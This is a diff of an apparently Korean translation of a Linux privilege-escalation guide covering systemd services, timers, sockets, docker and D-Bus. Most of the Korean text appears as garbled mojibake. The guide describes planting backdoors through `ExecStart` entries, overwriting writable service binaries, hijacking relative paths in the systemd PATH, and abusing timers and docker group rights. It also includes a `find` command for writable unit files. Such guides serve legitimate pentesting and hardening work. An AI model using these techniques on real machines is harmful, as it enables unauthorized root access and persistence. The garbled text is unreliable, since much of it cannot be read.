ํ™•์ธํ•˜์„ธ์š”. 
์“ธ ์ˆ˜ ์žˆ๋‹ค๋ฉด, ์„œ๋น„์Šค๊ฐ€ **์‹œ์ž‘**, **์žฌ์‹œ์ž‘** ๋˜๋Š” **์ค‘์ง€**๋  ๋•Œ **๋ฐฑ๋„์–ด๋ฅผ ์‹คํ–‰ํ•˜๋„๋ก** **์ˆ˜์ •ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค** (๊ธฐ๊ณ„๊ฐ€ ์žฌ๋ถ€ํŒ…๋  ๋•Œ๊นŒ์ง€ ๊ธฐ๋‹ค๋ ค์•ผ ํ•  ์ˆ˜๋„ ์žˆ์Šต๋‹ˆ๋‹ค).\ +์˜ˆ๋ฅผ ๋“ค์–ด, `.service` ํŒŒ์ผ ์•ˆ์— **`ExecStart=/tmp/script.sh`**๋กœ ๋ฐฑ๋„์–ด๋ฅผ ์ƒ์„ฑํ•˜์„ธ์š”. -### Writable service binaries +### ์“ฐ๊ธฐ ๊ฐ€๋Šฅํ•œ ์„œ๋น„์Šค ๋ฐ”์ด๋„ˆ๋ฆฌ ์„œ๋น„์Šค์— ์˜ํ•ด ์‹คํ–‰๋˜๋Š” ๋ฐ”์ด๋„ˆ๋ฆฌ์— **์“ฐ๊ธฐ ๊ถŒํ•œ**์ด ์žˆ๋Š” ๊ฒฝ์šฐ, ์ด๋ฅผ ๋ฐฑ๋„์–ด๋กœ ๋ณ€๊ฒฝํ•  ์ˆ˜ ์žˆ์œผ๋ฏ€๋กœ ์„œ๋น„์Šค๊ฐ€ ๋‹ค์‹œ ์‹คํ–‰๋  ๋•Œ ๋ฐฑ๋„์–ด๊ฐ€ ์‹คํ–‰๋ฉ๋‹ˆ๋‹ค. -### systemd PATH - Relative Paths +### systemd PATH - ์ƒ๋Œ€ ๊ฒฝ๋กœ **systemd**์—์„œ ์‚ฌ์šฉ๋˜๋Š” PATH๋ฅผ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: ```bash systemctl show-environment ``` -๊ฒฝ๋กœ์˜ ํด๋” ์ค‘์—์„œ **์“ฐ๊ธฐ**๊ฐ€ ๊ฐ€๋Šฅํ•˜๋‹ค๊ณ  ํŒ๋‹จ๋˜๋ฉด **๊ถŒํ•œ ์ƒ์Šน**์ด ๊ฐ€๋Šฅํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋‹ค์Œ๊ณผ ๊ฐ™์€ ์„œ๋น„์Šค ๊ตฌ์„ฑ ํŒŒ์ผ์—์„œ **์‚ฌ์šฉ๋˜๋Š” ์ƒ๋Œ€ ๊ฒฝ๋กœ**๋ฅผ ๊ฒ€์ƒ‰ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค: +๊ฒฝ๋กœ์˜ ํด๋” ์ค‘์—์„œ **์“ฐ๊ธฐ**๊ฐ€ ๊ฐ€๋Šฅํ•˜๋‹ค๊ณ  ํŒ๋‹จ๋˜๋ฉด **๊ถŒํ•œ ์ƒ์Šน**์ด ๊ฐ€๋Šฅํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋‹ค์Œ๊ณผ ๊ฐ™์€ ์„œ๋น„์Šค ๊ตฌ์„ฑ ํŒŒ์ผ์—์„œ **์ƒ๋Œ€ ๊ฒฝ๋กœ**๊ฐ€ ์‚ฌ์šฉ๋˜๊ณ  ์žˆ๋Š”์ง€ ๊ฒ€์ƒ‰ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค: ```bash ExecStart=faraday-server ExecStart=/bin/sh -ec 'ifup --allow=hotplug %I; ifquery --state %I' ExecStop=/bin/sh "uptux-vuln-bin3 -stuff -hello" ``` -๊ทธ๋Ÿฐ ๋‹ค์Œ, ์“ธ ์ˆ˜ ์žˆ๋Š” systemd PATH ํด๋” ๋‚ด์— **์ƒ๋Œ€ ๊ฒฝ๋กœ ์ด์ง„ ํŒŒ์ผ**๊ณผ **๊ฐ™์€ ์ด๋ฆ„**์˜ **์‹คํ–‰ ํŒŒ์ผ**์„ ์ƒ์„ฑํ•˜๊ณ , ์„œ๋น„์Šค๊ฐ€ ์ทจ์•ฝํ•œ ์ž‘์—…(**์‹œ์ž‘**, **์ค‘์ง€**, **๋‹ค์‹œ ๋กœ๋“œ**)์„ ์‹คํ–‰ํ•˜๋ผ๊ณ  ์š”์ฒญ๋ฐ›์„ ๋•Œ, ๋‹น์‹ ์˜ **๋ฐฑ๋„์–ด๊ฐ€ ์‹คํ–‰๋  ๊ฒƒ์ž…๋‹ˆ๋‹ค** (๋น„ํŠน๊ถŒ ์‚ฌ์šฉ์ž๋Š” ์ผ๋ฐ˜์ ์œผ๋กœ ์„œ๋น„์Šค๋ฅผ ์‹œ์ž‘/์ค‘์ง€ํ•  ์ˆ˜ ์—†์ง€๋งŒ `sudo -l`์„ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ๋Š”์ง€ ํ™•์ธํ•˜์‹ญ์‹œ์˜ค). +๊ทธ๋Ÿฐ ๋‹ค์Œ, ์“ธ ์ˆ˜ ์žˆ๋Š” systemd PATH ํด๋” ๋‚ด์— **์ƒ๋Œ€ ๊ฒฝ๋กœ ์ด์ง„ ํŒŒ์ผ**๊ณผ **๊ฐ™์€ ์ด๋ฆ„**์˜ **์‹คํ–‰ ํŒŒ์ผ**์„ ์ƒ์„ฑํ•˜๊ณ , ์„œ๋น„์Šค๊ฐ€ ์ทจ์•ฝํ•œ ์ž‘์—…(**์‹œ์ž‘**, **์ค‘์ง€**, **๋‹ค์‹œ ๋กœ๋“œ**)์„ ์‹คํ–‰ํ•˜๋„๋ก ์š”์ฒญ๋ฐ›์„ ๋•Œ, ๋‹น์‹ ์˜ **๋ฐฑ๋„์–ด๊ฐ€ ์‹คํ–‰๋  ๊ฒƒ์ž…๋‹ˆ๋‹ค** (๋น„ํŠน๊ถŒ ์‚ฌ์šฉ์ž๋Š” ์ผ๋ฐ˜์ ์œผ๋กœ ์„œ๋น„์Šค๋ฅผ ์‹œ์ž‘/์ค‘์ง€ํ•  ์ˆ˜ ์—†์ง€๋งŒ `sudo -l`์„ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ๋Š”์ง€ ํ™•์ธํ•˜์‹ญ์‹œ์˜ค). -**`man systemd.service`๋ฅผ ํ†ตํ•ด ์„œ๋น„์Šค์— ๋Œ€ํ•ด ๋” ์•Œ์•„๋ณด์‹ญ์‹œ์˜ค.** +**์„œ๋น„์Šค์— ๋Œ€ํ•œ ์ž์„ธํ•œ ๋‚ด์šฉ์€ `man systemd.service`๋ฅผ ์ฐธ์กฐํ•˜์‹ญ์‹œ์˜ค.** ## **ํƒ€์ด๋จธ** -**ํƒ€์ด๋จธ**๋Š” `**.service**` ํŒŒ์ผ์ด๋‚˜ ์ด๋ฒคํŠธ๋ฅผ ์ œ์–ดํ•˜๋Š” `**.timer**`๋กœ ๋๋‚˜๋Š” systemd ์œ ๋‹› ํŒŒ์ผ์ž…๋‹ˆ๋‹ค. **ํƒ€์ด๋จธ**๋Š” ์บ˜๋ฆฐ๋” ์‹œ๊ฐ„ ์ด๋ฒคํŠธ์™€ ๋‹จ์กฐ ์‹œ๊ฐ„ ์ด๋ฒคํŠธ์— ๋Œ€ํ•œ ๊ธฐ๋ณธ ์ง€์›์ด ์žˆ์–ด ๋น„๋™๊ธฐ์ ์œผ๋กœ ์‹คํ–‰๋  ์ˆ˜ ์žˆ์œผ๋ฏ€๋กœ cron์˜ ๋Œ€์•ˆ์œผ๋กœ ์‚ฌ์šฉ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. +**ํƒ€์ด๋จธ**๋Š” `**.service**` ํŒŒ์ผ ๋˜๋Š” ์ด๋ฒคํŠธ๋ฅผ ์ œ์–ดํ•˜๋Š” `**.timer**`๋กœ ๋๋‚˜๋Š” systemd ์œ ๋‹› ํŒŒ์ผ์ž…๋‹ˆ๋‹ค. **ํƒ€์ด๋จธ**๋Š” ์บ˜๋ฆฐ๋” ์‹œ๊ฐ„ ์ด๋ฒคํŠธ์™€ ๋‹จ์กฐ ์‹œ๊ฐ„ ์ด๋ฒคํŠธ์— ๋Œ€ํ•œ ๊ธฐ๋ณธ ์ง€์›์ด ์žˆ์–ด ๋น„๋™๊ธฐ์ ์œผ๋กœ ์‹คํ–‰๋  ์ˆ˜ ์žˆ์œผ๋ฏ€๋กœ cron์˜ ๋Œ€์•ˆ์œผ๋กœ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. 
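A quick way to spot potentially abusable timers before enumerating them (a hedged sketch assuming GNU `find`; adjust the unit paths to the distribution) is to look for `.timer`/`.service` unit files that the current user can write to:
```bash
# Sketch: unit files writable by the current user are candidates for timer abuse
find /etc/systemd/system /usr/lib/systemd/system /lib/systemd/system \
  \( -name "*.timer" -o -name "*.service" \) -writable 2>/dev/null
```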
-๋ชจ๋“  ํƒ€์ด๋จธ๋ฅผ ๋‚˜์—ดํ•˜๋ ค๋ฉด: +๋ชจ๋“  ํƒ€์ด๋จธ๋ฅผ ๋‚˜์—ดํ•˜๋ ค๋ฉด ๋‹ค์Œ์„ ์‚ฌ์šฉํ•˜์‹ญ์‹œ์˜ค: ```bash systemctl list-timers --all ``` @@ -423,8 +423,8 @@ Unit=backdoor.service ๋”ฐ๋ผ์„œ ์ด ๊ถŒํ•œ์„ ์•…์šฉํ•˜๋ ค๋ฉด ๋‹ค์Œ์ด ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค: -- **์“ฐ๊ธฐ ๊ฐ€๋Šฅํ•œ ๋ฐ”์ด๋„ˆ๋ฆฌ**๋ฅผ **์‹คํ–‰ํ•˜๋Š”** ์ผ๋ถ€ systemd ์œ ๋‹›(์˜ˆ: `.service`) ์ฐพ๊ธฐ -- **์ƒ๋Œ€ ๊ฒฝ๋กœ**๋ฅผ **์‹คํ–‰ํ•˜๋Š”** ์ผ๋ถ€ systemd ์œ ๋‹›์„ ์ฐพ๊ณ , **systemd PATH**์— ๋Œ€ํ•ด **์“ฐ๊ธฐ ๊ถŒํ•œ**์ด ์žˆ์–ด์•ผ ํ•ฉ๋‹ˆ๋‹ค(ํ•ด๋‹น ์‹คํ–‰ ํŒŒ์ผ์„ ๊ฐ€์žฅํ•˜๊ธฐ ์œ„ํ•ด) +- **์“ฐ๊ธฐ ๊ฐ€๋Šฅํ•œ ๋ฐ”์ด๋„ˆ๋ฆฌ**๋ฅผ **์‹คํ–‰ํ•˜๋Š”** ์ผ๋ถ€ systemd ์œ ๋‹›(์˜ˆ: `.service`)์„ ์ฐพ์Šต๋‹ˆ๋‹ค. +- **์ƒ๋Œ€ ๊ฒฝ๋กœ**๋ฅผ **์‹คํ–‰ํ•˜๋Š”** ์ผ๋ถ€ systemd ์œ ๋‹›์„ ์ฐพ๊ณ , **systemd PATH**์— ๋Œ€ํ•ด **์“ฐ๊ธฐ ๊ถŒํ•œ**์ด ์žˆ์–ด์•ผ ํ•ฉ๋‹ˆ๋‹ค(ํ•ด๋‹น ์‹คํ–‰ ํŒŒ์ผ์„ ๊ฐ€์žฅํ•˜๊ธฐ ์œ„ํ•ด). **ํƒ€์ด๋จธ์— ๋Œ€ํ•ด ๋” ์•Œ์•„๋ณด๋ ค๋ฉด `man systemd.timer`๋ฅผ ์ฐธ์กฐํ•˜์„ธ์š”.** @@ -446,9 +446,9 @@ Unix Domain Sockets (UDS)๋Š” ํด๋ผ์ด์–ธํŠธ-์„œ๋ฒ„ ๋ชจ๋ธ ๋‚ด์—์„œ ๋™์ผํ•˜ **์†Œ์ผ“์— ๋Œ€ํ•ด ๋” ์•Œ์•„๋ณด๋ ค๋ฉด `man systemd.socket`๋ฅผ ์ฐธ์กฐํ•˜์„ธ์š”.** ์ด ํŒŒ์ผ ๋‚ด์—์„œ ์—ฌ๋Ÿฌ ํฅ๋ฏธ๋กœ์šด ๋งค๊ฐœ๋ณ€์ˆ˜๋ฅผ ๊ตฌ์„ฑํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: - `ListenStream`, `ListenDatagram`, `ListenSequentialPacket`, `ListenFIFO`, `ListenSpecial`, `ListenNetlink`, `ListenMessageQueue`, `ListenUSBFunction`: ์ด ์˜ต์…˜๋“ค์€ ๋‹ค๋ฅด์ง€๋งŒ, **์†Œ์ผ“์ด ์–ด๋””์—์„œ ์ˆ˜์‹  ๋Œ€๊ธฐํ• ์ง€๋ฅผ ๋‚˜ํƒ€๋‚ด๊ธฐ ์œ„ํ•ด ์š”์•ฝ๋ฉ๋‹ˆ๋‹ค** (AF_UNIX ์†Œ์ผ“ ํŒŒ์ผ์˜ ๊ฒฝ๋กœ, ์ˆ˜์‹  ๋Œ€๊ธฐํ•  IPv4/6 ๋ฐ/๋˜๋Š” ํฌํŠธ ๋ฒˆํ˜ธ ๋“ฑ) -- `Accept`: ๋ถ€์šธ ์ธ์ˆ˜๋ฅผ ๋ฐ›์Šต๋‹ˆ๋‹ค. **true**์ธ ๊ฒฝ์šฐ, **๊ฐ ์ˆ˜์‹  ์—ฐ๊ฒฐ์— ๋Œ€ํ•ด ์„œ๋น„์Šค ์ธ์Šคํ„ด์Šค๊ฐ€ ์ƒ์„ฑ**๋˜๋ฉฐ, ์—ฐ๊ฒฐ ์†Œ์ผ“๋งŒ ์ „๋‹ฌ๋ฉ๋‹ˆ๋‹ค. **false**์ธ ๊ฒฝ์šฐ, ๋ชจ๋“  ์ˆ˜์‹  ์†Œ์ผ“ ์ž์ฒด๊ฐ€ **์‹œ์ž‘๋œ ์„œ๋น„์Šค ์œ ๋‹›์— ์ „๋‹ฌ**๋˜๋ฉฐ, ๋ชจ๋“  ์—ฐ๊ฒฐ์— ๋Œ€ํ•ด ๋‹จ ํ•˜๋‚˜์˜ ์„œ๋น„์Šค ์œ ๋‹›์ด ์ƒ์„ฑ๋ฉ๋‹ˆ๋‹ค. ์ด ๊ฐ’์€ ๋‹จ์ผ ์„œ๋น„์Šค ์œ ๋‹›์ด ๋ชจ๋“  ์ˆ˜์‹  ํŠธ๋ž˜ํ”ฝ์„ ๋ฌด์กฐ๊ฑด ์ฒ˜๋ฆฌํ•˜๋Š” ๋ฐ์ดํ„ฐ๊ทธ๋žจ ์†Œ์ผ“ ๋ฐ FIFO์— ๋Œ€ํ•ด ๋ฌด์‹œ๋ฉ๋‹ˆ๋‹ค. **๊ธฐ๋ณธ๊ฐ’์€ false**์ž…๋‹ˆ๋‹ค. ์„ฑ๋Šฅ์ƒ์˜ ์ด์œ ๋กœ, ์ƒˆ๋กœ์šด ๋ฐ๋ชฌ์€ `Accept=no`์— ์ ํ•ฉํ•œ ๋ฐฉ์‹์œผ๋กœ๋งŒ ์ž‘์„ฑํ•˜๋Š” ๊ฒƒ์ด ๊ถŒ์žฅ๋ฉ๋‹ˆ๋‹ค. -- `ExecStartPre`, `ExecStartPost`: ์ˆ˜์‹  ๋Œ€๊ธฐํ•˜๋Š” **์†Œ์ผ“**/FIFO๊ฐ€ **์ƒ์„ฑ**๋˜๊ณ  ๋ฐ”์ธ๋”ฉ๋˜๊ธฐ **์ „** ๋˜๋Š” **ํ›„**์— **์‹คํ–‰๋˜๋Š”** ํ•˜๋‚˜ ์ด์ƒ์˜ ๋ช…๋ น์ค„์„ ๋ฐ›์Šต๋‹ˆ๋‹ค. ๋ช…๋ น์ค„์˜ ์ฒซ ๋ฒˆ์งธ ํ† ํฐ์€ ์ ˆ๋Œ€ ํŒŒ์ผ ์ด๋ฆ„์ด์–ด์•ผ ํ•˜๋ฉฐ, ๊ทธ ๋‹ค์Œ์— ํ”„๋กœ์„ธ์Šค์— ๋Œ€ํ•œ ์ธ์ˆ˜๊ฐ€ ์˜ต๋‹ˆ๋‹ค. -- `ExecStopPre`, `ExecStopPost`: ์ˆ˜์‹  ๋Œ€๊ธฐํ•˜๋Š” **์†Œ์ผ“**/FIFO๊ฐ€ **๋‹ซํžˆ๊ณ ** ์ œ๊ฑฐ๋˜๊ธฐ **์ „** ๋˜๋Š” **ํ›„**์— **์‹คํ–‰๋˜๋Š”** ์ถ”๊ฐ€ **๋ช…๋ น**์ž…๋‹ˆ๋‹ค. +- `Accept`: ๋ถ€์šธ ์ธ์ˆ˜๋ฅผ ๋ฐ›์Šต๋‹ˆ๋‹ค. **true**์ธ ๊ฒฝ์šฐ, **๊ฐ ์ˆ˜์‹  ์—ฐ๊ฒฐ์— ๋Œ€ํ•ด ์„œ๋น„์Šค ์ธ์Šคํ„ด์Šค๊ฐ€ ์ƒ์„ฑ**๋˜๋ฉฐ, ์—ฐ๊ฒฐ ์†Œ์ผ“๋งŒ ์ „๋‹ฌ๋ฉ๋‹ˆ๋‹ค. **false**์ธ ๊ฒฝ์šฐ, ๋ชจ๋“  ์ˆ˜์‹  ๋Œ€๊ธฐ ์†Œ์ผ“ ์ž์ฒด๊ฐ€ **์‹œ์ž‘๋œ ์„œ๋น„์Šค ์œ ๋‹›์— ์ „๋‹ฌ**๋˜๋ฉฐ, ๋ชจ๋“  ์—ฐ๊ฒฐ์— ๋Œ€ํ•ด ๋‹จ ํ•˜๋‚˜์˜ ์„œ๋น„์Šค ์œ ๋‹›์ด ์ƒ์„ฑ๋ฉ๋‹ˆ๋‹ค. ์ด ๊ฐ’์€ ๋‹จ์ผ ์„œ๋น„์Šค ์œ ๋‹›์ด ๋ชจ๋“  ์ˆ˜์‹  ํŠธ๋ž˜ํ”ฝ์„ ๋ฌด์กฐ๊ฑด ์ฒ˜๋ฆฌํ•˜๋Š” ๋ฐ์ดํ„ฐ๊ทธ๋žจ ์†Œ์ผ“ ๋ฐ FIFO์— ๋Œ€ํ•ด ๋ฌด์‹œ๋ฉ๋‹ˆ๋‹ค. **๊ธฐ๋ณธ๊ฐ’์€ false**์ž…๋‹ˆ๋‹ค. ์„ฑ๋Šฅ์ƒ์˜ ์ด์œ ๋กœ, ์ƒˆ๋กœ์šด ๋ฐ๋ชฌ์€ `Accept=no`์— ์ ํ•ฉํ•œ ๋ฐฉ์‹์œผ๋กœ๋งŒ ์ž‘์„ฑํ•˜๋Š” ๊ฒƒ์ด ๊ถŒ์žฅ๋ฉ๋‹ˆ๋‹ค. +- `ExecStartPre`, `ExecStartPost`: ์ˆ˜์‹  ๋Œ€๊ธฐ **์†Œ์ผ“**/FIFO๊ฐ€ **์ƒ์„ฑ**๋˜๊ณ  ๋ฐ”์ธ๋”ฉ๋˜๊ธฐ **์ „** ๋˜๋Š” **ํ›„**์— **์‹คํ–‰๋˜๋Š”** ํ•˜๋‚˜ ์ด์ƒ์˜ ๋ช…๋ น์ค„์„ ๋ฐ›์Šต๋‹ˆ๋‹ค. 
๋ช…๋ น์ค„์˜ ์ฒซ ๋ฒˆ์งธ ํ† ํฐ์€ ์ ˆ๋Œ€ ํŒŒ์ผ ์ด๋ฆ„์ด์–ด์•ผ ํ•˜๋ฉฐ, ๊ทธ ๋‹ค์Œ์— ํ”„๋กœ์„ธ์Šค์— ๋Œ€ํ•œ ์ธ์ˆ˜๊ฐ€ ์˜ต๋‹ˆ๋‹ค. +- `ExecStopPre`, `ExecStopPost`: ์ˆ˜์‹  ๋Œ€๊ธฐ **์†Œ์ผ“**/FIFO๊ฐ€ **๋‹ซํžˆ๊ณ ** ์ œ๊ฑฐ๋˜๊ธฐ **์ „** ๋˜๋Š” **ํ›„**์— **์‹คํ–‰๋˜๋Š”** ์ถ”๊ฐ€ **๋ช…๋ น**์ž…๋‹ˆ๋‹ค. - `Service`: **์ˆ˜์‹  ํŠธ๋ž˜ํ”ฝ**์— ๋Œ€ํ•ด **ํ™œ์„ฑํ™”ํ• ** **์„œ๋น„์Šค** ์œ ๋‹› ์ด๋ฆ„์„ ์ง€์ •ํ•ฉ๋‹ˆ๋‹ค. ์ด ์„ค์ •์€ Accept=no์ธ ์†Œ์ผ“์— ๋Œ€ํ•ด์„œ๋งŒ ํ—ˆ์šฉ๋ฉ๋‹ˆ๋‹ค. ๊ธฐ๋ณธ๊ฐ’์€ ์†Œ์ผ“๊ณผ ๋™์ผํ•œ ์ด๋ฆ„์„ ๊ฐ€์ง„ ์„œ๋น„์Šค์ž…๋‹ˆ๋‹ค (์ ‘๋ฏธ์‚ฌ๊ฐ€ ๋Œ€์ฒด๋จ). ๋Œ€๋ถ€๋ถ„์˜ ๊ฒฝ์šฐ, ์ด ์˜ต์…˜์„ ์‚ฌ์šฉํ•  ํ•„์š”๋Š” ์—†์Šต๋‹ˆ๋‹ค. ### Writable .socket files @@ -536,9 +536,9 @@ Upgrade: tcp ### ๊ธฐํƒ€ -**docker** ๊ทธ๋ฃน์— **์†ํ•ด ์žˆ๊ธฐ ๋•Œ๋ฌธ์—** docker ์†Œ์ผ“์— ๋Œ€ํ•œ ์“ฐ๊ธฐ ๊ถŒํ•œ์ด ์žˆ๋Š” ๊ฒฝ์šฐ [**๊ถŒํ•œ ์ƒ์Šน์„ ์œ„ํ•œ ๋” ๋งŽ์€ ๋ฐฉ๋ฒ•**](interesting-groups-linux-pe/index.html#docker-group)์ด ์žˆ์Šต๋‹ˆ๋‹ค. [**docker API๊ฐ€ ํฌํŠธ์—์„œ ์ˆ˜์‹  ๋Œ€๊ธฐ ์ค‘์ธ ๊ฒฝ์šฐ** ์ด๋ฅผ ์†์ƒ์‹œํ‚ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค](../../network-services-pentesting/2375-pentesting-docker.md#compromising). +**docker** ๊ทธ๋ฃน์— **์†ํ•ด ์žˆ๊ธฐ ๋•Œ๋ฌธ์—** docker ์†Œ์ผ“์— ๋Œ€ํ•œ ์“ฐ๊ธฐ ๊ถŒํ•œ์ด ์žˆ๋Š” ๊ฒฝ์šฐ [**๊ถŒํ•œ ์ƒ์Šน์„ ์œ„ํ•œ ๋” ๋งŽ์€ ๋ฐฉ๋ฒ•**](interesting-groups-linux-pe/index.html#docker-group)์ด ์žˆ์Šต๋‹ˆ๋‹ค. [**docker API๊ฐ€ ํฌํŠธ์—์„œ ์ˆ˜์‹  ๋Œ€๊ธฐ ์ค‘์ด๋ผ๋ฉด ์ด๋ฅผ ํƒ€๊ฒฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค**](../../network-services-pentesting/2375-pentesting-docker.md#compromising). -๋‹ค์Œ์—์„œ **docker์—์„œ ํƒˆ์ถœํ•˜๊ฑฐ๋‚˜ ๊ถŒํ•œ์„ ์ƒ์Šน์‹œํ‚ค๊ธฐ ์œ„ํ•ด ์•…์šฉํ•  ์ˆ˜ ์žˆ๋Š” ๋” ๋งŽ์€ ๋ฐฉ๋ฒ•**์„ ํ™•์ธํ•˜์„ธ์š”: +๋‹ค์Œ์—์„œ **docker์—์„œ ํƒˆ์ถœํ•˜๊ฑฐ๋‚˜ ๊ถŒํ•œ ์ƒ์Šน์„ ์œ„ํ•ด ์•…์šฉํ•  ์ˆ˜ ์žˆ๋Š” ๋” ๋งŽ์€ ๋ฐฉ๋ฒ•**์„ ํ™•์ธํ•˜์„ธ์š”: {{#ref}} docker-security/ @@ -562,13 +562,13 @@ runc-privilege-escalation.md ## **D-Bus** -D-Bus๋Š” ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์ด ํšจ์œจ์ ์œผ๋กœ ์ƒํ˜ธ ์ž‘์šฉํ•˜๊ณ  ๋ฐ์ดํ„ฐ๋ฅผ ๊ณต์œ ํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ด์ฃผ๋Š” ์ •๊ตํ•œ **ํ”„๋กœ์„ธ์Šค ๊ฐ„ ํ†ต์‹ (IPC) ์‹œ์Šคํ…œ**์ž…๋‹ˆ๋‹ค. ํ˜„๋Œ€ Linux ์‹œ์Šคํ…œ์„ ์—ผ๋‘์— ๋‘๊ณ  ์„ค๊ณ„๋œ D-Bus๋Š” ๋‹ค์–‘ํ•œ ํ˜•ํƒœ์˜ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜ ํ†ต์‹ ์„ ์œ„ํ•œ ๊ฐ•๋ ฅํ•œ ํ”„๋ ˆ์ž„์›Œํฌ๋ฅผ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค. +D-Bus๋Š” ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์ด ํšจ์œจ์ ์œผ๋กœ ์ƒํ˜ธ์ž‘์šฉํ•˜๊ณ  ๋ฐ์ดํ„ฐ๋ฅผ ๊ณต์œ ํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ด์ฃผ๋Š” ์ •๊ตํ•œ **ํ”„๋กœ์„ธ์Šค ๊ฐ„ ํ†ต์‹ (IPC) ์‹œ์Šคํ…œ**์ž…๋‹ˆ๋‹ค. ํ˜„๋Œ€ Linux ์‹œ์Šคํ…œ์„ ์—ผ๋‘์— ๋‘๊ณ  ์„ค๊ณ„๋˜์–ด ๋‹ค์–‘ํ•œ ํ˜•ํƒœ์˜ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜ ํ†ต์‹ ์„ ์œ„ํ•œ ๊ฐ•๋ ฅํ•œ ํ”„๋ ˆ์ž„์›Œํฌ๋ฅผ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค. ์ด ์‹œ์Šคํ…œ์€ ๊ธฐ๋ณธ IPC๋ฅผ ์ง€์›ํ•˜์—ฌ ํ”„๋กœ์„ธ์Šค ๊ฐ„ ๋ฐ์ดํ„ฐ ๊ตํ™˜์„ ํ–ฅ์ƒ์‹œํ‚ค๋ฉฐ, **ํ–ฅ์ƒ๋œ UNIX ๋„๋ฉ”์ธ ์†Œ์ผ“**์„ ์—ฐ์ƒ์‹œํ‚ต๋‹ˆ๋‹ค. ๋˜ํ•œ ์ด๋ฒคํŠธ๋‚˜ ์‹ ํ˜ธ๋ฅผ ๋ฐฉ์†กํ•˜๋Š” ๋ฐ ๋„์›€์„ ์ฃผ์–ด ์‹œ์Šคํ…œ ๊ตฌ์„ฑ ์š”์†Œ ๊ฐ„์˜ ์›ํ™œํ•œ ํ†ตํ•ฉ์„ ์ด‰์ง„ํ•ฉ๋‹ˆ๋‹ค. ์˜ˆ๋ฅผ ๋“ค์–ด, Bluetooth ๋ฐ๋ชฌ์—์„œ ์ˆ˜์‹  ์ „ํ™”์— ๋Œ€ํ•œ ์‹ ํ˜ธ๊ฐ€ ์Œ์•… ํ”Œ๋ ˆ์ด์–ด๋ฅผ ์Œ์†Œ๊ฑฐํ•˜๋„๋ก ํ•  ์ˆ˜ ์žˆ์–ด ์‚ฌ์šฉ์ž ๊ฒฝํ—˜์„ ํ–ฅ์ƒ์‹œํ‚ต๋‹ˆ๋‹ค. ์ถ”๊ฐ€๋กœ, D-Bus๋Š” ์›๊ฒฉ ๊ฐ์ฒด ์‹œ์Šคํ…œ์„ ์ง€์›ํ•˜์—ฌ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜ ๊ฐ„์˜ ์„œ๋น„์Šค ์š”์ฒญ ๋ฐ ๋ฉ”์„œ๋“œ ํ˜ธ์ถœ์„ ๊ฐ„์†Œํ™”ํ•˜์—ฌ ์ „ํ†ต์ ์œผ๋กœ ๋ณต์žกํ–ˆ๋˜ ํ”„๋กœ์„ธ์Šค๋ฅผ ๊ฐ„์†Œํ™”ํ•ฉ๋‹ˆ๋‹ค. -D-Bus๋Š” **ํ—ˆ์šฉ/๊ฑฐ๋ถ€ ๋ชจ๋ธ**์— ๋”ฐ๋ผ ์ž‘๋™ํ•˜๋ฉฐ, ๋ฉ”์‹œ์ง€ ๊ถŒํ•œ(๋ฉ”์„œ๋“œ ํ˜ธ์ถœ, ์‹ ํ˜ธ ์ „์†ก ๋“ฑ)์„ ๋ˆ„์  ํšจ๊ณผ์— ๋”ฐ๋ผ ๊ด€๋ฆฌํ•ฉ๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ์ •์ฑ…์€ ๋ฒ„์Šค์™€์˜ ์ƒํ˜ธ ์ž‘์šฉ์„ ์ง€์ •ํ•˜๋ฉฐ, ์ด๋Ÿฌํ•œ ๊ถŒํ•œ์„ ์•…์šฉํ•˜์—ฌ ๊ถŒํ•œ ์ƒ์Šน์„ ํ—ˆ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. 
+D-Bus๋Š” **ํ—ˆ์šฉ/๊ฑฐ๋ถ€ ๋ชจ๋ธ**์— ๋”ฐ๋ผ ์ž‘๋™ํ•˜๋ฉฐ, ๋ฉ”์‹œ์ง€ ๊ถŒํ•œ(๋ฉ”์„œ๋“œ ํ˜ธ์ถœ, ์‹ ํ˜ธ ์ „์†ก ๋“ฑ)์„ ๋ˆ„์  ํšจ๊ณผ์— ๋”ฐ๋ผ ๊ด€๋ฆฌํ•ฉ๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ์ •์ฑ…์€ ๋ฒ„์Šค์™€์˜ ์ƒํ˜ธ์ž‘์šฉ์„ ์ง€์ •ํ•˜๋ฉฐ, ์ด๋Ÿฌํ•œ ๊ถŒํ•œ์„ ์•…์šฉํ•˜์—ฌ ๊ถŒํ•œ ์ƒ์Šน์„ ํ—ˆ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. -`/etc/dbus-1/system.d/wpa_supplicant.conf`์— ์ œ๊ณต๋œ ์ •์ฑ…์˜ ์˜ˆ๋Š” root ์‚ฌ์šฉ์ž๊ฐ€ `fi.w1.wpa_supplicant1`์œผ๋กœ๋ถ€ํ„ฐ ๋ฉ”์‹œ์ง€๋ฅผ ์†Œ์œ ํ•˜๊ณ , ์ „์†กํ•˜๊ณ , ์ˆ˜์‹ ํ•  ์ˆ˜ ์žˆ๋Š” 